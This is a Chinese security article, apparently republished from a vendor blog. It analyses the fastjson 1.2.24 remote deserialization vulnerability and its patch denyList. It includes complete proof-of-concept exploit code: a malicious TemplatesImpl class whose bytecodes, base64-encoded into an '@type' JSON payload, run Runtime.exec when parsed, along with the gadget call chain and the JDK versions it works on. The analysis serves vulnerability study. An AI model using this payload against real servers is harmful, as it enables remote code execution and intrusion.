|
|
51CTO旗下网站
|
|
移动端

Fastjson远程反序列化程序验证的构造和分析

fastjson官方主动爆出fastjson在1.2.24及之前版本存在远程代码执行高危安全漏洞。攻击者可以通过此漏洞远程执行恶意代码来入侵服务器。

作者:xxlegend来源:绿盟科技博客|2017-05-04 09:30

fastjson是一个java编写的高性能功能非常完善的JSON库,应用范围非常广,在github上star数都超过8k,在2017年3月15日,fastjson官方主动爆出fastjson在1.2.24及之前版本存在远程代码执行高危安全漏洞。攻击者可以通过此漏洞远程执行恶意代码来入侵服务器。

关于漏洞的具体详情可参考 :https://github.com/alibaba/fastjson/wiki/security_update_20170315

受影响的版本

  1. fastjson <= 1.2.24 

静态分析

根据官方给出的补丁文件,主要的更新在这个checkAutoType函数上,而这个函数的主要功能就是添加了黑名单,将一些常用的反序列化利用库都添加到黑名单中。

具体包括:

  1. bsh,com.mchange,com.sun.,java.lang.Thread,java.net.Socket,java.rmi,javax.xml,org.apache.bcel,org.apache.commons.beanutils, 
  2. org.apache.commons.collections.Transformer,org.apache.commons.collections.functors,org.apache.commons.collections4. 
  3. comparators,org.apache.commons.fileupload,org.apache.myfaces.context.servlet,org.apache.tomcat,org.apache.wicket.util, 
  4. org.codehaus.groovy.runtime,org.hibernate,org.jboss,org.mozilla.javascript,org.python.core,org.springframework 

下面我们来分析checkAutoType的函数实现:

  1. if (typeName == null) { 
  2.             return null
  3.         } 
  4.   
  5.         if (typeName.length() >= maxTypeNameLength) { 
  6.             throw new JSONException("autoType is not support. " + typeName); 
  7.         } 
  8.   
  9.         final String className = typeName.replace('$''.'); 
  10.   
  11.         if (autoTypeSupport || expectClass != null) { 
  12.             for (int i = 0; i < acceptList.length; ++i) { 
  13.                 String accept = acceptList[i]; 
  14.                 if (className.startsWith(accept)) { 
  15.                     return TypeUtils.loadClass(typeName, defaultClassLoader); 
  16.                 } 
  17.             } 
  18.   
  19.             for (int i = 0; i < denyList.length; ++i) { 
  20.                 String deny = denyList[i]; 
  21.                 if (className.startsWith(deny)) { 
  22.                     throw new JSONException("autoType is not support. " + typeName); 
  23.                 } 
  24.             } 
  25.         } 
  26.   
  27.         Class<?> clazz = TypeUtils.getClassFromMapping(typeName); 
  28.         if (clazz == null) { 
  29.             clazz = deserializers.findClass(typeName); 
  30.         } 
  31.   
  32.         if (clazz != null) { 
  33.             if (expectClass != null && !expectClass.isAssignableFrom(clazz)) { 
  34.                 throw new JSONException("type not match. " + typeName + " -> " + expectClass.getName()); 
  35.             } 
  36.   
  37.             return clazz; 
  38.         } 

核心部分就是denyList的处理过程,遍历denyList,如果引入的库以denyList中某个deny打头,就会抛出异常,中断运行。

程序验证构造

静态分析得知,要构造一个可用的程序,肯定得引入denyList的库。刚开始fastjson官方公布漏洞信息时,当时就尝试构造验证程序,怎奈fastjson的代码确实庞大,还有asm机制,通过asm机制生成的临时代码下不了断点。当时也只能通过在通过类初始化的时候弹出一个计算器,很显然这个构造方式不具有通用性,最近jackson爆出反序列漏洞,其中就利用了TemplatesImpl类,而这个类有一个字段就是_bytecodes,有部分函数会根据这个_bytecodes生成java实例,简直不能再更妙,这就解决了fastjson通过字段传入一个类,再通过这个类执行有害代码。后来阅读ysoserial的代码时也发现在gadgets.java这个文件中也使用到了这个类来动态生成可执行命令的代码。

下面是一个程序验证的代码:

  1. import com.sun.org.apache.xalan.internal.xsltc.DOM; 
  2. import com.sun.org.apache.xalan.internal.xsltc.TransletException; 
  3. import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; 
  4. import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; 
  5. import com.sun.org.apache.xml.internal.serializer.SerializationHandler; 
  6.   
  7. import java.io.IOException; 
  8.   
  9. public class Test extends AbstractTranslet { 
  10.     public Test() throws IOException { 
  11.         Runtime.getRuntime().exec("calc"); 
  12.     } 
  13.   
  14.     @Override 
  15.     public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) { 
  16.     } 
  17.   
  18.     @Override 
  19.     public void transform(DOM document, com.sun.org.apache.xml.internal.serializer.SerializationHandler[] handlers) throws TransletException { 
  20.   
  21.     } 
  22.   
  23.     public static void main(String[] args) throws Exception { 
  24.         Test t = new Test(); 
  25.     } 

这个是Test.java的实现,在Test.java的构造函数中执行了一条命令,弹出计算器。编译Test.java得到Test.class供后续使用。后续会将Test.class的内容赋值给_bytecodes。让我们接着分析:

  1. package person; 
  2.   
  3. import com.alibaba.fastjson.JSON; 
  4. import com.alibaba.fastjson.parser.Feature; 
  5. import com.alibaba.fastjson.parser.ParserConfig; 
  6. import org.apache.commons.io.IOUtils; 
  7. import org.apache.commons.codec.binary.Base64; 
  8.   
  9. import java.io.ByteArrayOutputStream; 
  10. import java.io.File; 
  11. import java.io.FileInputStream; 
  12. import java.io.IOException; 
  13.   
  14. /** 
  15.  * Created by web on 2017/4/29. 
  16.  */ 
  17. public class P{ 
  18.   
  19.     public static String readClass(String cls){ 
  20.         ByteArrayOutputStream bos = new ByteArrayOutputStream(); 
  21.         try { 
  22.             IOUtils.copy(new FileInputStream(new File(cls)), bos); 
  23.         } catch (IOException e) { 
  24.             e.printStackTrace(); 
  25.         } 
  26.         return Base64.encodeBase64String(bos.toByteArray()); 
  27.   
  28.     } 
  29.   
  30.     public static void  test_autoTypeDeny() throws Exception { 
  31.         ParserConfig config = new ParserConfig(); 
  32.         final String fileSeparator = System.getProperty("file.separator"); 
  33.         final String evilClassPath = System.getProperty("user.dir") + "\\target\\classes\\person\\Test.class"
  34.         String evilCode = readClass(evilClassPath); 
  35.         final String NASTY_CLASS = "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"
  36.         String text1 = "{\"@type\":\"" + NASTY_CLASS + 
  37.                 "\",\"_bytecodes\":[\""+evilCode+"\"],'_name':'a.b',\"_outputProperties\":{ }," + 
  38.                 "\"_name\":\"a\",\"_version\":\"1.0\",\"allowedProtocols\":\"all\"}\n"
  39.         System.out.println(text1); 
  40.         
  41.         Object obj = JSON.parseObject(text1, Object.class, config, Feature.SupportNonPublicField); 
  42.         //assertEquals(Model.class, obj.getClass()); 
  43.     } 
  44.     public static void main(String args[]){ 
  45.         try { 
  46.             test_autoTypeDeny(); 
  47.         } catch (Exception e) { 
  48.             e.printStackTrace(); 
  49.         } 
  50.     } 

在这个程序验证代码中,最核心的部分是_bytecodes,它是要执行的代码,@type是指定的解析类,fastjson会根据指定类去反序列化得到该类的实例,在默认情况下,fastjson只会反序列化公开的属性和域,而com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl中_bytecodes却是私有属性,_name也是私有域,所以在parseObject的时候需要设置Feature.SupportNonPublicField,这样_bytecodes字段才会被反序列化。_tfactory这个字段在TemplatesImpl既没有get方法也没有set方法,所以是设置不了的,弹计算器的图中展示了但是实际运行却没有使用,只能依赖于jdk的实现,作者在1.8.0_25,1.7.0_05测试都能弹出计算器,某些版本中在defineTransletClasses()用到会引用_tfactory属性导致异常退出。

接下来我们看下TemplatesImpl.java的几个关键函数:

  1. public synchronized Properties getOutputProperties() { 
  2.         try { 
  3.             return newTransformer().getOutputProperties(); 
  4.         } 
  5.         catch (TransformerConfigurationException e) { 
  6.             return null
  7.         } 
  8.     } 
  1. public synchronized Transformer newTransformer() 
  2.         throws TransformerConfigurationException 
  3.     { 
  4.         TransformerImpl transformer; 
  5.   
  6.         transformer = new TransformerImpl(getTransletInstance(), _outputProperties, 
  7.             _indentNumber, _tfactory); 
  8.   
  9.         if (_uriResolver != null) { 
  10.             transformer.setURIResolver(_uriResolver); 
  11.         } 
  12.   
  13.         if (_tfactory.getFeature(XMLConstants.FEATURE_SECURE_PROCESSING)) { 
  14.             transformer.setSecureProcessing(true); 
  15.         } 
  16.         return transformer; 
  17.     } 
  1. private Translet getTransletInstance() 
  2.         throws TransformerConfigurationException { 
  3.         try { 
  4.             if (_name == nullreturn null
  5.   
  6.             if (_class == null) defineTransletClasses(); 
  7.   
  8.             // The translet needs to keep a reference to all its auxiliary 
  9.             // class to prevent the GC from collecting them 
  10.             AbstractTranslet translet = (AbstractTranslet) _class[_transletIndex].newInstance(); 
  11.             translet.postInitialization(); 
  12.             translet.setTemplates(this); 
  13.             translet.setServicesMechnism(_useServicesMechanism); 
  14.             if (_auxClasses != null) { 
  15.                 translet.setAuxiliaryClasses(_auxClasses); 
  16.             } 
  17.   
  18.             return translet; 
  19.         } 
  20.         catch (InstantiationException e) { 
  21.             ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR, _name); 
  22.             throw new TransformerConfigurationException(err.toString()); 
  23.         } 
  24.         catch (IllegalAccessException e) { 
  25.             ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR, _name); 
  26.             throw new TransformerConfigurationException(err.toString()); 
  27.         } 
  28.     } 
  1. private void defineTransletClasses() 
  2.         throws TransformerConfigurationException { 
  3.   
  4.         if (_bytecodes == null) { 
  5.             ErrorMsg err = new ErrorMsg(ErrorMsg.NO_TRANSLET_CLASS_ERR); 
  6.             throw new TransformerConfigurationException(err.toString()); 
  7.         } 
  8.   
  9.         TransletClassLoader loader = (TransletClassLoader) 
  10.             AccessController.doPrivileged(new PrivilegedAction() { 
  11.                 public Object run() { 
  12.                     return new TransletClassLoader(ObjectFactory.findClassLoader()); 
  13.                 } 
  14.             }); 
  15.   
  16.         try { 
  17.             final int classCount = _bytecodes.length; 
  18.             _class = new Class[classCount]; 
  19.   
  20.             if (classCount > 1) { 
  21.                 _auxClasses = new Hashtable(); 
  22.             } 
  23.   
  24.             for (int i = 0; i < classCount; i++) { 
  25.                 _class[i] = loader.defineClass(_bytecodes[i]); 
  26.                 final Class superClass = _class[i].getSuperclass(); 
  27.   
  28.                 // Check if this is the main class 
  29.                 if (superClass.getName().equals(ABSTRACT_TRANSLET)) { 
  30.                     _transletIndex = i; 
  31.                 } 
  32.                 else { 
  33.                     _auxClasses.put(_class[i].getName(), _class[i]); 
  34.                 } 
  35.             } 
  36.   
  37.             if (_transletIndex < 0) { 
  38.                 ErrorMsg err= new ErrorMsg(ErrorMsg.NO_MAIN_TRANSLET_ERR, _name); 
  39.                 throw new TransformerConfigurationException(err.toString()); 
  40.             } 
  41.         } 
  42.         catch (ClassFormatError e) { 
  43.             ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_CLASS_ERR, _name); 
  44.             throw new TransformerConfigurationException(err.toString()); 
  45.         } 
  46.         catch (LinkageError e) { 
  47.             ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR, _name); 
  48.             throw new TransformerConfigurationException(err.toString()); 
  49.         } 
  50.     } 

在getTransletInstance调用defineTransletClasses,在defineTransletClasses方法中会根据_bytecodes来生成一个java类,生成的java类随后会被getTransletInstance方法用到生成一个实例,也也就到了最终的执行命令的位置Runtime.getRuntime.exec()

下面我们上一张调用链的图:

简单来说就是:

  1. JSON.parseObject 
  2. ... 
  3. JavaBeanDeserializer.deserialze 
  4. ... 
  5. FieldDeserializer.setValue 
  6. ... 
  7. TemplatesImpl.getOutputProperties 
  8. TemplatesImpl.newTransformer 
  9. TemplatesImpl.getTransletInstance 
  10. ... 
  11. Runtime.getRuntime().exec 

附上一张成功执行图:

总结

该程序验证的影响jdk 1.7,1.8版本,1.6未测试,但是需要在parseObject的时候设置Feature.SupportNonPublicField。

【编辑推荐】

  1. Phpcms v9漏洞分析
  2. 知道创宇“网络空间威胁大数据分析论坛”成功举办
  3. 大数据安全分析的阶段性建设
  4. 企业如何构建用户行为分析功能?
  5. 利用企业邮件系统构造命令控制(C&C)和数据窃取(Exfiltration)通道的思路探讨
【责任编辑:武晓燕 TEL:(010)68476606】

点赞 0
分享:
大家都在看
猜你喜欢

读 书 +更多

非常网管——网络工程案例

本书面向企业网络应用需求,详细介绍了Windows网络互联解决方案、中小企业共享上网解决方案、基于ISA Server 2006的代理服务器与防火墙解决...

订阅51CTO邮刊

点击这里查看样刊

订阅51CTO邮刊